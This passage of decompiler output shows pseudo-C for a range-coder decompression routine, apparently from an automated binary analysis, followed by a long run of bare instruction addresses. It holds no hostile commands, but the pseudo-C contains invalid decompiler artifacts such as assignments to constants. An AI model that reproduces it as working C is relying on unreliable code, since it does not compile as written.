												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406e9d
0x00406e9d
0x00406ea1
0x00406ec2
0x00406ec9
0x00406ecf
0x00406ed5
0x00406ee7
0x00406eed
0x00406ef2
0x00000000
0x00406ea3
0x00406ea9
0x0040726a
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
